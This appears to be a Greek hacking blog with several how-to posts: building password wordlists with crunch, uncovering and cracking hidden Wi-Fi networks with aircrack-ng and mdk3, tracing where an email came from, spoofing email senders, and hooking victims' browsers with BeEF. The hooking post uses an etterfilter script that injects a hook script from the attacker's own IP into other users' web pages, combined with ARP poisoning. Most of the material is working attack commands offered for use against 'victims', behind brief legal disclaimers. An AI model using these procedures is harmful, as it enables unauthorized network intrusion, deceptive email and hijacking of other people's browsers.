    mixalpha-numeric-all= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
    mixalpha-numeric-all-space= [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
  • πχ αν θελω να φτιαξω μια λιστα με ονομα και κωδικο οπως Nikos99 δλδ το ονομα και ημερομηνια γεννησης
  • ./crunch 7 7 -f charset.lst numeric -t Nikos%% -o /root/nikos.txt
  • και θα δημιουργησει μια λιστα απο Nikos00-Nikos99
  • οπου 7 7 το μηκους των κωδικων εφοσον το Nikos ειναι ηδη 5 και 2 τα τελευταια ψηφια θα ειναι 7
  • -f τι χαρακτηρες θα χρησιμοποιησει
  • -t την βαση που δεν θα αλλαζει και %% θα βαζει αριθμους αν @@ θα βαζει γραμματα αν ^^ θα βαζει ειδικους χαρακτηρες χαρακτηρες
  • -ο που θα αποθηκευτει
  • ./crunch 10 10 -f charset.lst numeric -t 694%%%%%%% -o /root/kinhta.txt
  • θα δημιουργησετε μια λιστα απο ολα τα κινητα 694 απο 6940000000-6949999999 η οποια θα ειναι 104.9 mb  
  • *επιπλεον επιλογες
  • -b χωριζετε σε μεγεθος δλδ αν ειναι 100mb μπορειτε να την χωρισετε σε 50mb 2 αρχεια πχ -b KB / MB / GB (πρεπει να το χρησιμοποιησετε με -o START *START ειναι το προσωρινο αρχειο που αποθηκευετε η λιστα θα την βρειτε /pentest/passwords/crunch
  • -c  χωριζετε σε γραμμες αντι για μεγεθος 100000 ειναι περιπου 1mb (-o START)
  • -e ποτε θα σταματισει πχ αν θελω να δημιουργησω απο το 00000-99999 μπορω να το σταματησω στο 33333
  • -r συνεχιζω την λιστα αν την εχω σταματησει
  • -s βαζω την λιστα μου να αρχισει απο καπου πχ ./crunch 4 4 123456789 -s 4444 θα αρχισει απο 4444 και η λιστα θα ειναι 4444-9999 
  • -z συμπιεζω την λιστα -z gzip, bzip , lzma
και ετσι φτιαχνετε τις λιστες σας

Δευτέρα 9 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα κρυφο ασυρματο δικτυο


Με αυτο τον οδηγο θα μπορειτε να βρειτε το ονομα απο ενα κρυφο ασυρματο δικτυο και τον κωδικο(δεν ευθυνομαι για κακοβουλη χρηση του σε ξενα δικτυα καθως ειναι παρανομο να μοιραζεσαι το δικτυο χωρις την συγκαταθεση του ιδιοκτητη)


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Υπαρχουνε 2 τροποι
  • με το aireplay-ng και με το mdk3
Aireplay-ng (αν υπαρχει καποιος ηδη συνδεδεμενος)
  • οταν το ψαξουμε με το wicd network manager θα μας το εμφανισει ετσι 

  • ανοιγουμε ενα τερματικο και γραφουμε 
  • airmon-ng start wlan0
  • airodump-ng mon0 και οταν δουμε με ονομα <length:  6>δλδ εμενα το ονομα ειναι 6 γραμματα αν λεει  <lenght 3> ειναι 3 κτλ.
  • airodump-ng -w kryfo --bssid 00:1F:9F:8E:53:9B -c 1 mon0
  • οπου 
  • -w το ονομα που θα αποθηκευοντε οι πληροφοριες
  • --bssid η mac address του ασυρματου δικτυου
  • -c το καναλι που εκπεμπει το δικτυο
  • βαλαμε το airodump-ng να ακουει συγκεκριμενα σε αυτο το δικτυο
  • αν δουμε καποιον station συνδεδεμενο τοτε γραφουμε
  • aireplay-ng -0 4 -a 00:1F:9F:8E:53:9B -c 00:34:45:45:45:34 mon0
  • οπου 
  • -0 deauthentication ποσες φορες θα κανουμε
  • -a η mac address του δικτυου
  • -c η mac address του χρηστη(station)
  • οταν πιασουμε το handshake θα μας εμφανισει και το ονομα του δικτυου
  • οποτε μετα μπορουμε να συνεχισουμε το σπασιμο του δικτυου
  • για wpa απλα εφοσον εχουμε πιασει το handshake απλα γραφουμε την εντολη aircrack-ng /root/kryfo*.cap -w /root/lexika/lexiko.txt 
  • οπου 
  • -w στο φακελο οπου εχετε το λεξικο σας
Mdk3
  • γραφουμε σε ενα τερματικο airmon-ng start wlan0 *αν δεν το εχουμε ξεκινησει απο πριν
  • airodump-ng mon0 ωστε να δουμε το bssid και το καναλι του δικτυου μετα το σταματαμε με ctrl+c και παλι airodump-ng -w * --bssid * -c * mon0
  • και ανοιγουμε ενα αλλο τερματικο και γραφουμε
  • mdk3 mon0 p -b a -c 1 -t 00:1F:9F:8E:53:9B -s 1000
  • οπου p -b ειναι το σπασιμο με brutalforce για το δικτυο
  • -c το καναλι
  • -b a για ολους τους χαρακτηρες
  • -b u για κεφαλαια γραμματα
  • -b l για μικρα γραμματα
  • -b n για αριθμους
  • -t η mac address του δικτυου
  • -s ποσα πακετα θα στελνουμε (καλυτερα μην χρησιμοποιησετε αυτη την επιλογη γιατι σε ορισμενες καρτες δεν δουλευει)
  • * -f αν θελετε να κοιταει σε αρχειο.txt για τα ονοματα
  • θα σας δειξει και αλλα δικτυα που ειναι στο καναλλι  απλα αφηστε το μεχρι να τελειωσει και θα σας εμφανισει το ονομα οπως εδω

  • για wep  εχουμε ξεκινησει το airodump-ng στο συγκεκριμενο δικτυο οπως πανω γραφουμε σε ενα τερματικο aireplay-ng -1 0 -a bssid mon0
  • μετα aireplay-ng -3 -b bssid mon0 
  • *(bssid = mac address του δικτυου)
  • οταν φτασουν τα πακετα πανω απο 5000
  • ανοιγω ενα αλλο τερματικο και γραφω 
  • aircrack-ng /root/kryfo*.cap
*οταν τελειωσω και βρω κωδικο και ονομα παω στο wicd Network Manager 
παταω Network -find a hidden network γραφω το ονομα βαζω και τον κωδικο στο properties και τελος

Πως θα προστατευτειτε;

1.Να εχετε wpa2 κρυπτογραφηση στο δικτυο σας με δυσκολο κωδικο και αν θελετε μπορειτε να κρυψετε το δικτυο σας ανουσιο βεβαια αλλα θα δυσκολεψει αρκετα τον αλλον ωστε να βρει ονομα και κωδικο....
2.Καντε ενσυρματη την συνδεση σας στο διαδικτυο

Κυριακή 8 Ιανουαρίου 2012

Πως εντοπιζω ενα email

Με αυτο τον οδηγο θα σας δειξω πως να εντοπισετε τα ιχνη της φυσικης διευθυνσης απο οπου σταλθηκε το email.


Τι  θα χρειαστειτε;

1.Firefox ή IE

  • πηγαινουμε στο email μας πχ για hotmail παταω δεξι κλικ στο μηνυμα που θελω να εντοπισω και παταω εκει που λεει προβολη προελευσης μηνυματος 



  • θα σας ανοιξει μια καινουργια καρτελα οπως εδω
  • και βλεπετε προσεχτικα την ip sender 
  • μετα πηγαινετε στο  http://www.ip-adress.com/ip_tracer/ και γραψτε την ip πχ εγω πηρα ενα μηνυμα της Groupon  και ανακαλυψα οτι το μηνυμα σταλθηκε απο Γερμανια.το οποιο μας λεει οτι η Groupon ειναι Γερμανικη εταιρεια και η Ελληνικη ειναι franchise.

     
    Απλα να ξερετε οτι το email το εντοπιζετε μεχρι την ISP υπηρεσια του
    και οχι στο σπιτι του αποστολεα και για να το εντοπισετε ακριβως πρεπει να επικοινωνησετε με την υπηρεσια πχ για Ελλαδα Forthnet ,ΟΤΕ,Ηol κλπ  και μονο αυτες μπορουνε να σας δωσουνε την ακριβη τοποθεσια εφοσον υπαρχει λογος σοβαρος(συνηθως οταν υπαρχει ποινικη διωξη)

     

     

Σάββατο 7 Ιανουαρίου 2012

SendEmail καντε πλακα στους φιλους και γνωστους σας

Με αυτο τον οδηγο θα σας δειξω πως μπορειτε να στειλετε email και να βαλετε οτι email θελετε για αποστολεα
* ο οδηγος εχει ανανεωθει 13.01.2015*


Τι θα χρειαστειτε;

1.Backtack 5 R1 / Kali Linux


*Για Kali linux
 leafpad /usr/share/perl5/IO/Socket/SSL.pm
και αλλαζουμε  την γραμμη
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?)&}i     με
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?))}i
αποθηκευουμε
η εντολη για να στειλουμε ειναι

sendemail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m  Jenna is looking for Greek Star are you interesting? -s smtp.gmail.com:587 -xu ********@gmail.com -xp ******* -o tls=yes

  •  ανοιγω ενα τερματικο και γραφω
  • sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m Jenna is looking for Greek Star are you interesting? -s smtp.googlemail.com -xu *******@gmail.com -xp ************
  • οπου
  • -f το email του αποστολεα
  • -t το email του θυματος
  • -u την επικεφαλιδα του μηνυματος
  • -m το μηνυμα
  • -s την υπηρεσια smtp για gmail ειναι αυτη που βλεπετε πανω
  • -xu το gmail σας (καλυτερα να φτιαξετε ενα τυχαιο)
  • -xp ο κωδικος του gmail σας
  • αν θελετε μπορειτε να μην βαλετε την επιλογη -m και θα γραψετε μετα το μηνυμα απλα πρεπει να γραψετε μεσα σε ενα λεπτο την πρωτη γραμμη και μετα οταν γραψετε το υπολοιπο μερος του πατηστε ctrl+d και θα αποσταλθει
  • επισεις αν θελετε να στειλετε συννημενο το στελνετε με την επιλογη -a και ακολουθει η διευθυνση του αρχειου που θελετε να στειλετε πχ sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -a /root/arxeio -u Hello Greek Tsolia -m Jenna is looking for Greek Tsolia Are you interesting? -s smtp.googlemail.com -xu **********@gmail -xp ***********
  • και στο θυμα θα του εμφανιστει αυτο


  • http://www.sendanonymousemail.net/  και http://emkei.cz/ εδω μπορειτε να στειλετε μεσω του browser σας αν εχετε αλλο λειτουργικο πχ windows,mac κτλ.

 



Τετάρτη 4 Ιανουαρίου 2012

Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του


Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο

Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.Cross-Site-Sctript (xss)


  • πριν αρχισουμε παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα
  • #Nickthesail0r
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</head>")) {
            replace("</head>", "</head><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("EPIASES_LAYRAKI\n");
        }
        if (search(DATA.data, "</HEAD>")) {
            replace("</HEAD>", "</HEAD><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("epiases_layraki\n");
        }
    }
  • πρεπει να βαλεις την δικια σου ip στο http://192.168.1.66
  • μετα παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef
  • παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)

  • αλλαξε το http://127.0.0.1/beef με την δικια σου ip πχ http://192.168.1.66/beef ,πατα apply config και finished 
  • τωρα για να δειτε τι κανει το beEF ακριβως μπορεις να το δοκιμασεις σε εσενα αν πας στο view spawn zombie example
     και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα

  • και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss 

  • Υπαρχουνε παρα πολλες επιλογες οπως να εισβαλετε στον υπολογιστη του να τον ανακατευθυνετε σε αλλη σελιδα κτλ
  • τωρα πως κανουμε το θυμα να ενωθει μαζι μας;
  • ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο και γραφουμε
  • etterfilter /root/Desktop/xssbeef -ο xssbeef.ef
  • μας εμφανιζει αυτο
  • etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA


     12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

     11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

     Parsing source file '/root/Desktop/xssbeef'  done.

     Unfolding the meta-tree  done.

     Converting labels to real offsets  done.

     Writing output to 'filter.ef'  done.

     -> Script encoded into 20 instructions.
  • μετα γραφουμε στο τερματικο ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift+u επιλεγουμε wlan0 μετα ctrl+s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl+f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα 
  • τελος παταμε ctrl+w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες) * αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef'  -i wlan0